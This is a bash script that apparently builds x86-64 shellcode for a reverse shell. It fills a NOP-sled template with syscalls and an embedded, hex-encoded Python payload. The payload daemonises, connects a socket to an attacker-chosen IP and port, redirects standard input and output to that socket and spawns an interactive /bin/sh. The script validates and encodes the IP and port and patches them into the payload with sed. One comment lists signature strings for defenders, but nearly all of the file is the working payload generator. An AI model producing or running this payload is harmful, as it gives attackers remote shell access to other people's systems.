#!/bin/bash
# drx - MIT License - Copyright 2020
# David Reguera Garcia aka Dreg - dreg@fr33project.org
# -
# http://github.com/David-Reguera-Garcia-Dreg/ - http://www.fr33project.org/
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
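# Positional arguments: $1 = IPv4 address (dotted quad), $2 = TCP port.
IP="${1:-127.0.0.1}"
PORT="${2:-9999}"

#######################################
# Validate a dotted-quad IPv4 address and encode it for the sed substitution.
# Each octet becomes two uppercase hex digits, and each digit is written as
# the text "\\xNN" of its ASCII code (10 characters per octet, 40 in total).
# The address is rejected unless it is exactly four dot-separated fields of
# 1-3 decimal digits, each in 0-255. Out-of-range or empty fields are an
# error; they are no longer silently skipped.
# Arguments: $1 - address to encode
# Outputs:   encoded string on stdout
# Returns:   0 on success, 1 if the address is not a valid dotted quad
#######################################
_encode_ip() {
  local addr=$1 octet hex out=''
  local re='^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$'
  local -a octets

  [[ "$addr" =~ $re ]] || return 1
  octets=("${BASH_REMATCH[@]:1}")

  for octet in "${octets[@]}"; do
    # Force base 10 so a field such as "08" is not parsed as (invalid) octal.
    octet=$((10#$octet))
    ((octet <= 255)) || return 1
    printf -v hex '%02X' "$octet"
    # "'c" makes printf yield the character code of c, i.e. the ASCII value
    # of each hex digit.
    printf -v out '%s\\\\x%x\\\\x%x' "$out" "'${hex:0:1}" "'${hex:1:1}"
  done

  printf '%s' "$out"
}

#######################################
# Validate a port and encode it for the sed substitution.
# The template placeholder is four ASCII digits, so only 1000-9999 fits.
# Each digit d is written as the text "\\x3d" (ASCII code of that digit).
# Arguments: $1 - port to encode
# Outputs:   encoded string on stdout
# Returns:   0 on success, 1 if the port is not four digits in 1000-9999
#######################################
_encode_port() {
  local port=$1 out='' i

  case "$port" in
    [1-9][0-9][0-9][0-9]) ;;
    *) return 1 ;;
  esac

  for ((i = 0; i < ${#port}; i++)); do
    out+="\\\\x3${port:i:1}"
  done

  printf '%s' "$out"
}

# Both results are assigned outright, so values of ip_hex/port_hex inherited
# from the environment can never leak into the sed expressions below.
ip_hex=$(_encode_ip "$IP") || {
  echo "invalid ip" >&2
  exit 1
}
port_hex=$(_encode_port "$PORT") || {
  echo "port must be in range 1000-9999" >&2
  exit 1
}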
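# Shellcode fun here: print the template as literal "\xNN" text, then patch it.
# The first sed swaps the placeholder port (ASCII "9999") for $port_hex; the
# second swaps the placeholder address (ASCII "7f000001") for $ip_hex.
# Both replacements are the same length as their placeholders, so the byte
# offsets inside the template are unchanged.
# For defenders: once decoded, the template contains readable strings
# ("/bin/python", "-c", "/bin/sh", "/bin/sudo") and an embedded Python snippet
# using socket/os.dup2/subprocess, all of which are usable as signatures.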
echo -n "\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xb8\\x39\\x00\\x00\\x00\\x0f\\x05\\x48\\x83\\xf8\\x00\\x74\\x25\\x48\\x89\\xc7\\xbe\\x00\\x00\\x00\\x00\\xba\\x00\\x00\\x00\\x00\\x41\\xba\\x00\\x00\\x00\\x00\\x41\\xb8\\x00\\x00\\x00\\x00\\xb8\\x3d\\x00\\x00\\x00\\x0f\\x05\\xe9\\x5f\\x02\\x00\\x00\\x6a\\x00\\xe8\\x0d\\x02\\x00\\x00\\x65\\x78\\x65\\x63\\x28\\x22\\x22\\x22\\x0a\\x69\\x6d\\x70\\x6f\\x72\\x74\\x20\\x73\\x6f\\x63\\x6b\\x65\\x74\\x2c\\x73\\x75\\x62\\x70\\x72\\x6f\\x63\\x65\\x73\\x73\\x2c\\x6f\\x73\\x2c\\x73\\x79\\x73\\x0a\\x0a\\x70\\x69\\x64\\x72\\x67\\x20\\x3d\\x20\\x6f\\x73\\x2e\\x66\\x6f\\x72\\x6b\\x28\\x29\\x0a\\x69\\x66\\x20\\x70\\x69\\x64\\x72\\x67\\x20\\x3e\\x20\\x30\\x3a\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x73\\x79\\x73\\x2e\\x65\\x78\\x69\\x74\\x28\\x30\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x63\\x68\\x64\\x69\\x72\\x28\\x22\\x2f\\x22\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x73\\x65\\x74\\x73\\x69\\x64\\x28\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x75\\x6d\\x61\\x73\\x6b\\x28\\x30\\x29\\x0a\\x0a\\x64\\x72\\x67\\x70\\x69\\x64\\x20\\x3d\\x20\\x6f\\x73\\x2e\\x66\\x6f\\x72\\x6b\\x28\\x29\\x0a\\x69\\x66\\x20\\x64\\x72\\x67\\x70\\x69\\x64\\x20\\x3e\\x20\\x30\\x3a\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x73\\x79\\x73\\x2e\\x65\\x78\\x69\\x74\\x28\\x30\\x29\\x0a\\x0a\\x73\\x79\\x73\\x2e\\x73\\x74\\x64\\x6f\\x75\\x74\\x2e\\x66\\x6c\\x75\\x73\\x68\\x28\\x29\\x0a\\x0a\\x73\\x79\\x73\\x2e\\x73\\x74\\x64\\x65\\x72\\x72\\x2e\\x66\\x6c\\x75\\x73\\x68\\x28\\x29\\x0a\\x0a\\x66\\x64\\x72\\x65\\x67\\x20\\x3d\\x20\\x6f\\x70\\x65\\x6e\\x28\\x22\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x22\\x2c\\x20\\x22\\x77\\x22\\x29\\x0a\\x0a\\x73\\x79\\x73\\x2e\\x73\\x74\\x64\\x6f\\x75\\x74\\x20\\x3d\\x20\\x66\\x64\\x72\\x65\\x67\\x0a\\x0a\\x73\\x79\\x73\\x2e\\x73\\x74\\x64\\x65\\x72\\x72\
\x20\\x3d\\x20\\x66\\x64\\x72\\x65\\x67\\x0a\\x0a\\x73\\x64\\x72\\x65\\x67\\x73\\x3d\\x73\\x6f\\x63\\x6b\\x65\\x74\\x2e\\x73\\x6f\\x63\\x6b\\x65\\x74\\x28\\x73\\x6f\\x63\\x6b\\x65\\x74\\x2e\\x41\\x46\\x5f\\x49\\x4e\\x45\\x54\\x2c\\x73\\x6f\\x63\\x6b\\x65\\x74\\x2e\\x53\\x4f\\x43\\x4b\\x5f\\x53\\x54\\x52\\x45\\x41\\x4d\\x29\\x0a\\x0a\\x73\\x64\\x72\\x65\\x67\\x73\\x2e\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x28\\x28\\x73\\x74\\x72\\x28\\x30\\x78\\x37\\x66\\x30\\x30\\x30\\x30\\x30\\x31\\x29\\x2c\\x39\\x39\\x39\\x39\\x29\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x64\\x75\\x70\\x32\\x28\\x73\\x64\\x72\\x65\\x67\\x73\\x2e\\x66\\x69\\x6c\\x65\\x6e\\x6f\\x28\\x29\\x2c\\x30\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x64\\x75\\x70\\x32\\x28\\x73\\x64\\x72\\x65\\x67\\x73\\x2e\\x66\\x69\\x6c\\x65\\x6e\\x6f\\x28\\x29\\x2c\\x31\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x64\\x75\\x70\\x32\\x28\\x73\\x64\\x72\\x65\\x67\\x73\\x2e\\x66\\x69\\x6c\\x65\\x6e\\x6f\\x28\\x29\\x2c\\x32\\x29\\x0a\\x0a\\x70\\x3d\\x73\\x75\\x62\\x70\\x72\\x6f\\x63\\x65\\x73\\x73\\x2e\\x63\\x61\\x6c\\x6c\\x28\\x5b\\x22\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x22\\x2c\\x22\\x2d\\x69\\x22\\x5d\\x29\\x0a\\x22\\x22\\x22\\x29\\x00\\xe8\\x03\\x00\\x00\\x00\\x2d\\x63\\x00\\xe8\\x0c\\x00\\x00\\x00\\x2f\\x62\\x69\\x6e\\x2f\\x70\\x79\\x74\\x68\\x6f\\x6e\\x00\\x48\\x8d\\x05\\x21\\x00\\x00\\x00\\x50\\x48\\x31\\xd2\\x48\\x89\\xe6\\x48\\x8d\\x3d\\x13\\x00\\x00\\x00\\xb8\\x3b\\x00\\x00\\x00\\x0f\\x05\\xb8\\x3c\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x00\\x0f\\x05\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x00\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90" | sed 's/\\x39\\x39\\x39\\x39/'"$port_hex"'/g' | sed 's/\\x37\\x66\\x30\\x30\\x30\\x30\\x30\\x31/'"$ip_hex"'/g'